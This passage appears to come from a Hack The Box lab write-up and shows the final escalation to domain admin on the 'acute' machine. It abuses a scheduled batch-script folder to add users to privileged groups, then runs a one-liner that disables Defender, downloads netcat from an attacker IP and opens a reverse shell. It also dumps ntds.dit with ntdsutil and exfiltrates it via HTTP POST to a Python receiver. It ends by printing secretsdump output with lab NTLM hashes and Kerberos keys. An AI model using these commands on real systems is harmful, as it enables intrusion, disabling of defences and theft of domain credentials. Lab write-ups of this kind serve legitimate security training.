keepmeon
as previously mentioned, there exists a batch script designed to execute other batch scripts located within the same directory; c:\Program Files\keepmeon
This script is supposedly configured as a scheduled task, set to run every 5 minutes, and operates under the security context of the lhopkins user
I will first add the current user to the Site_Admin group by creating a batch script in the same directory
Site_Admin
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path "C:\Program Files\keepmeon\site_admin.bat" -Value "NET GROUP /DOMAIN Site_Admin /ADD awallace"}
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ls "C:\Program Files\keepmeon"}
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER
-a---- 07/11/2023 14:16 44 site_admin.bat ATSSERVER A batch file is created; C:\Program Files\keepmeon\site_admin.bat
Now, this newly created batch script will add the awallace user to the Site_Admin group
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {net group Site_Admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.A moment later, I can confirmed that the awallace user has been added to the Site_Admin group
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.Another thing that I discovered is that having a membership to the Site_Admin group, the awallace user is no longer bound by the dc_manage configuration rule
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {NET GROUPS /DOMAIN "Domain Admins" /ADD edavies}
The command completed successfully.It turns out that membership to the Site_Admin group provides a direct write access to the Domain Admins group as I am able to add anyone to the DA group.
Additionally, this operation seems to get reverted as users in it eventually get flushed out
I would need to be quick
Domain Admin
ps c:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {NET GROUP /DOMAIN "Domain Admins" /ADD awallace ; Set-MpPreference -DisableRealtimeMonitoring $true ; Set-MpPreference -DisableIOAVProtection $true ; Set-MpPreference -DisableScriptScanning 1 ; iwr -Uri http://10.10.16.8/nc64.exe -Outfile C:\Users\awallace\Documents\nc64.exe ; C:\Users\awallace\Documents\nc64.exe 10.10.16.8 1234 -e powershell}The above command will additionally add the awallace user to the Domain Admins group, disable AV, upload Netcat and execute a reverse shell back to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49550
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\Users\awallace\Documents> whoami
whoami
acute\awallace
ps c:\Users\awallace\Documents> hostname
hostname
ATSSERVER
ps c:\Users\awallace\Documents> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter vethernet (vswitch1):
connection-specific dns suffix . :
link-local ipv6 address . . . . . : fe80::30d2:fb97:8091:2846%9
ipv4 address. . . . . . . . . . . : 172.16.22.1
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . :
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::249
ipv6 address. . . . . . . . . . . : dead:beef::78a4:cbc4:b505:36bb
link-local ipv6 address . . . . . : fe80::78a4:cbc4:b505:36bb%8
ipv4 address. . . . . . . . . . . : 10.10.11.145
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%8
10.10.10.2
ps c:\Users\awallace\Documents> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
acute\awallace S-1-5-21-1786406921-1914792807-2072761762-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
ACUTE\Domain Admins Group S-1-5-21-1786406921-1914792807-2072761762-512 Mandatory group, Enabled by default, Enabled group
ACUTE\Managers Group S-1-5-21-1786406921-1914792807-2072761762-1111 Mandatory group, Enabled by default, Enabled group
ACUTE\Site_Admin Group S-1-5-21-1786406921-1914792807-2072761762-2102 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
ACUTE\Denied RODC Password Replication Group Alias S-1-5-21-1786406921-1914792807-2072761762-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.The awallace user is now a domain admin
Hashdump
PS C:\Users\awallace\Documents> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp
Creating snapshot...
Snapshot set {9625219d-75c0-46cd-a7de-20b5ce1b2d16} generated successfully.
Snapshot {7e0d795f-9124-4a3c-b370-e29ea483c6f4} mounted as C:\$SNAP_202311071518_VOLUMEC$\
Snapshot {7e0d795f-9124-4a3c-b370-e29ea483c6f4} is already mounted.
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_202311071518_VOLUMEC$\Windows\NTDS\ntds.dit
Target Database: c:\temp\Active Directory\ntds.dit
Defragmentation Status (omplete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying c:\temp\registry\SYSTEM
Copying c:\temp\registry\SECURITY
Snapshot {7e0d795f-9124-4a3c-b370-e29ea483c6f4} unmounted.
IFM media created successfully in c:\temp
ifm: q
C:\Windows\system32\ntdsutil.exe: qDumping domain secret using the LOLBAS ntdsutil.exe
PS C:\Users\awallace\Documents> Compress-Archive -Path C:\temp\* -DestinationPath .\secret.zip
PS C:\Users\awallace\Documents> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Users\awallace\Documents\secret.zip'Archiving secrets into the secret.zip file and sending it over a HTTP post request
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ cat post.py
from http.server import BaseHTTPRequestHandler, HTTPServer
class MyRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length'])
data = self.rfile.read(content_length)
with open('secret.zip', 'wb') as f:
f.write(data)
self.send_response(200)
httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ python3 post.py
10.10.11.145 - - [07/Nov/2023 23:06:56] "POST / HTTP/1.1" 200 -A local python web server will receive and save the archive
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ unzip secret.zip
Archive: secret.zip
warning: secret.zip appears to use backslashes as path separators
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
inflating: registry/SECURITY
inflating: registry/SYSTEM Extracting
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ATSSERVER]
└─$ impacket-secretsdump local -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x76b30d09b168e2fef3eafd2807ef4d38
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:a392d50c942385f994169a745ecd191f1f0e4acb051e59e8b90b6d64b78f8f33309e62f95af5f845702bf0dbe860f059aecf9e01910014c868e0b0b7d031fd30e432de1c9bf9fcecb23626e18ae986f73703ab94b7de2a9e2f6ce0d31aab86026388c611824385cfe1a9ef2085eef86caf7261317e0f90f9b2b13adb7381376d05bd76bfb49a59a05116befbc32b483a06c495c87080a194eba7e72dcf88ceb8086e773a5075de1ccc0f86d4fc2248d8414d245756bb2f9232bb5620388791110f855ac5a98734253960a8feac4825b9e436fe4ea1b9172a3ea06e8293d1152271238dfa8d7148eade65394a2d82d2b3
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f4a0354252e672f70e598382ffac04ea
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f0d7ab061a6e3f1bfea035b82b949f71bea0c19
dpapi_userkey:0x99f7c96ea5e383cc1f4baf033c7f6ca49cd601d9
[*] NL$KM
0000 2D 23 A3 4B AC 45 DB DA 2A 27 C8 AD 7E 5D 76 D5 -#.K.E..*'..~]v.
0010 81 B8 11 ED 7B 22 DF 73 8E 2B EE 21 57 80 41 27 ....{".s.+.!W.A'
0020 1A BF A1 03 FD 88 CD 57 EA 9F 49 5C 07 2F A8 33 .......W..I\./.3
0030 FA B6 E4 7B 29 BF DC 66 6F 6D 0B C2 50 9D A3 30 ...{)..fom..P..0
NL$KM:2d23a34bac45dbda2a27c8ad7e5d76d581b811ed7b22df738e2bee21578041271abfa103fd88cd57ea9f495c072fa833fab6e47b29bfdc666f6d0bc2509da330
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 0077467258de8907401360af09cc7347
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ATSSERVER$:1000:aad3b435b51404eeaad3b435b51404ee:f4a0354252e672f70e598382ffac04ea:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d54887a4cc5d73de54d051600c4b13b:::
MARVEL-PC01$:1103:aad3b435b51404eeaad3b435b51404ee:3298a4f2794fdb6686160c34d059d186:::
acute.local\awallace:1104:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
acute.local\chall:1105:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
acute.local\edavies:1106:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
acute.local\imonks:1107:aad3b435b51404eeaad3b435b51404ee:38da83dd3b7bdb2878360a21b9480c1f:::
acute.local\jmorgan:1108:aad3b435b51404eeaad3b435b51404ee:b0956dfd75fc21fc6e852a3ce59a4365:::
acute.local\lhopkins:1109:aad3b435b51404eeaad3b435b51404ee:0237ca8f3465a7ee79f4ab44cc5e2ce6:::
ACUTE-PC01$:1110:aad3b435b51404eeaad3b435b51404ee:816f14efc1aef18b93f811509ea9a98e:::
[*] Kerberos keys from Active Directory/ntds.dit
Administrator:aes256-cts-hmac-sha1-96:8eeb6bb41cd28667f0d0be32a08e156607d59dbd34a111b8cb2cc461b677ced1
Administrator:aes128-cts-hmac-sha1-96:f4ee7bbf28a9fb5b04afce1d77278570
Administrator:des-cbc-md5:375729df3443fd67
ATSSERVER$:aes256-cts-hmac-sha1-96:1b0ec6837ffa5583029f3bc6f5bbf270f6be2155d6709f45167968027e363e02
ATSSERVER$:aes128-cts-hmac-sha1-96:48785e2c83d18b3850d9b958c387da91
ATSSERVER$:des-cbc-md5:ab586292b0985b20
krbtgt:aes256-cts-hmac-sha1-96:ce621dc40a293908302e23040618038b61371d0726352f94ed5323ecb30c54b9
krbtgt:aes128-cts-hmac-sha1-96:bfc9310a26fd8a76c62a4f1633d59f4c
krbtgt:des-cbc-md5:bc9764ba29103e3d
MARVEL-PC01$:aes256-cts-hmac-sha1-96:6513f54bc5f013565b66da03671875ce2963f2e050393400a4b4f8a0ac3f58c2
MARVEL-PC01$:aes128-cts-hmac-sha1-96:281712b9f17c86450c672811e31d95ea
MARVEL-PC01$:des-cbc-md5:d67aae02ad9db9f8
acute.local\awallace:aes256-cts-hmac-sha1-96:0bd72e1d05064caff0242a61a5dab479fa22f13985102c7addd80109612a80df
acute.local\awallace:aes128-cts-hmac-sha1-96:e7381ee64e34b1283d5e5ab4beeba1a4
acute.local\awallace:des-cbc-md5:043d1c01dc29b002
acute.local\chall:aes256-cts-hmac-sha1-96:1b401c70f15399f71f807dfce443166374e395396495dccf19b0353b50d9f692
acute.local\chall:aes128-cts-hmac-sha1-96:82647731d3564cb3cb00f8e413e0f276
acute.local\chall:des-cbc-md5:024aba20fee04f61
acute.local\edavies:aes256-cts-hmac-sha1-96:b45ae6f2a6137dc1f663b2d1950525d769c4e9ecabe7c655312b3eb9b2dd51a2
acute.local\edavies:aes128-cts-hmac-sha1-96:4a21f715dab8dde7b2dfd990fd1b0d18
acute.local\edavies:des-cbc-md5:b34ae0aeb691b33b
acute.local\imonks:aes256-cts-hmac-sha1-96:6a7dfb308bf8816070751df631c6c779204b2cf096269dea09dde6984e2a5621
acute.local\imonks:aes128-cts-hmac-sha1-96:af0fe425eabef7a993bba356fb59d2ce
acute.local\imonks:des-cbc-md5:b9b69dd3078361c8
acute.local\jmorgan:aes256-cts-hmac-sha1-96:15a496b292b44da5804ea97717282ea899a0336f999b4a69f5f8070709bf52db
acute.local\jmorgan:aes128-cts-hmac-sha1-96:f6ea7b70a7a594ebbe0ed4f788b96bf6
acute.local\jmorgan:des-cbc-md5:89d94a7c76a47cbc
acute.local\lhopkins:aes256-cts-hmac-sha1-96:cbca467bf21b3024582a9639581bf0c974d127066181ac316ae2cbb9b4867c41
acute.local\lhopkins:aes128-cts-hmac-sha1-96:58b3a7455920afdfeb1d05db5c821b6b
acute.local\lhopkins:des-cbc-md5:7654572958f15ec4
ACUTE-PC01$:aes256-cts-hmac-sha1-96:35bf4c979219843861167a3aea4d4d88cf7766a1d478cd6de18d0f43b3d0da0d
ACUTE-PC01$:aes128-cts-hmac-sha1-96:1a33fc3e0d8ca913f54889337d48a7e3
ACUTE-PC01$:des-cbc-md5:014a67150b2ab0e5
[*] Cleaning up... Domain Level Compromise